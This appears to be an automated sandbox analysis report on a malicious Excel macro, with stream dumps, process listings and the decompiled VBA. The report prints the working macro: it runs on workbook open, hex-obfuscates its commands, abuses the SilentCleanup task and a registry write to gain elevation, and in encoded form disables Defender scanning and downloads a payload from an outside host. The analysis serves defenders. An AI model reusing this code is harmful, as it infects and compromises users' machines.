Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 230
General
Stream Path:VBA/__SRP_3
File Type:data
Stream Size:230
Entropy:2.07483755026
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . q . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . P . ! . . . . . . . . . . . . . . ` . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 71 08 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
Stream Path: VBA/dir, File Type: data, Stream Size: 515
General
Stream Path:VBA/dir
File Type:data
Stream Size:515
Entropy:6.31110415976
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . G . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:01 ff b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fc 47 10 62 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:08:12:37
Start date:08/02/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13fba0000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:12:38
Start date:08/02/2021
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Imagebase:0x4ab10000
File size:345088 bytes
MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:08:12:39
Start date:08/02/2021
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Imagebase:0xfffa0000
File size:285696 bytes
MD5 hash:97E0EC3D6D99E8CC2B17EF2D3760E8FC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Call Graph

Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
  • Show Help
callgraph 18 Workbook_Open RegWrite:1,Now:1,Run:1,Close:1,CreateObject:3, Wait:1,TimeValue:1 98 hgfhffsadsa Len:1,Mid:1,Chr:1,CLng:1 18->98 x 4

Module: Sheet1

Declaration
LineContent
1

Attribute VB_Name = "Sheet1"

2

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration
LineContent
1

Attribute VB_Name = "ThisWorkbook"

2

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

Executed Functions
APIsMeta Information

CreateObject

CreateObject("WScript.Shell")

CreateObject

CreateObject("WScript.Shell")

RegWrite

Part of subcall function hgfhffsadsa@ThisWorkbook: Len

Part of subcall function hgfhffsadsa@ThisWorkbook: Chr

Part of subcall function hgfhffsadsa@ThisWorkbook: CLng

Part of subcall function hgfhffsadsa@ThisWorkbook: Mid

Run

IWshShell3.Run("cmd /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I") -> 0

Part of subcall function hgfhffsadsa@ThisWorkbook: Len

Part of subcall function hgfhffsadsa@ThisWorkbook: Chr

Part of subcall function hgfhffsadsa@ThisWorkbook: CLng

Part of subcall function hgfhffsadsa@ThisWorkbook: Mid

CreateObject

CreateObject("WScript.Shell")

Wait

Now

TimeValue

RegDelete

Part of subcall function hgfhffsadsa@ThisWorkbook: Len

Part of subcall function hgfhffsadsa@ThisWorkbook: Chr

Part of subcall function hgfhffsadsa@ThisWorkbook: CLng

Part of subcall function hgfhffsadsa@ThisWorkbook: Mid

Close

StringsDecrypted Strings
"WScript.Shell"
"WScript.Shell"
"545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E"
"6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33"
"6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55"
"545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E"
"WScript.Shell"
LineInstructionMeta Information
9

Public Sub Workbook_Open()

10

Set ghhfgfgdsfas = CreateObject("WScript.Shell")

CreateObject("WScript.Shell")

executed
11

Set ghhfgfgdsfas = CreateObject("WScript.Shell")

CreateObject("WScript.Shell")

executed
12

a = "545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E"

13

b = "6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33"

14

c = "6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55"

15

d = "545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E"

16

ghhfgfgdsfas.RegWrite hgfhffsadsa(a), hgfhffsadsa(b)

RegWrite

17

ghhfgfgdsfas.Run (hgfhffsadsa(c))

IWshShell3.Run("cmd /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I") -> 0

executed
18

Set ghhfgfgdsfas = CreateObject("WScript.Shell")

CreateObject("WScript.Shell")

executed
19

Application.Wait (Now + TimeValue("0:00:07"))

Wait

Now

TimeValue

20

ghhfgfgdsfas.RegDelete hgfhffsadsa(d)

RegDelete

21

ActiveWorkbook.Close

Close

22

End Sub

APIsMeta Information

Len

Len("545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E") -> 72 Len("6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33") -> 520 Len("6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55") -> 144

Chr

CLng

Mid

StringsDecrypted Strings
""""
LineInstructionMeta Information
23

Function hgfhffsadsa(str)

24

Dim i

executed
25

Dim sStr

26

sStr = ""

27

For i = 1 To Len(str) Step 2

Len("545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E") -> 72

executed
28

sStr = sStr + Chr(CLng("&H" & Mid(str, i, 2)) - 12)

Chr

CLng

Mid

29

Next

Len("545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E") -> 72

executed
30

hgfhffsadsa = sStr

31

End Function

Reset < >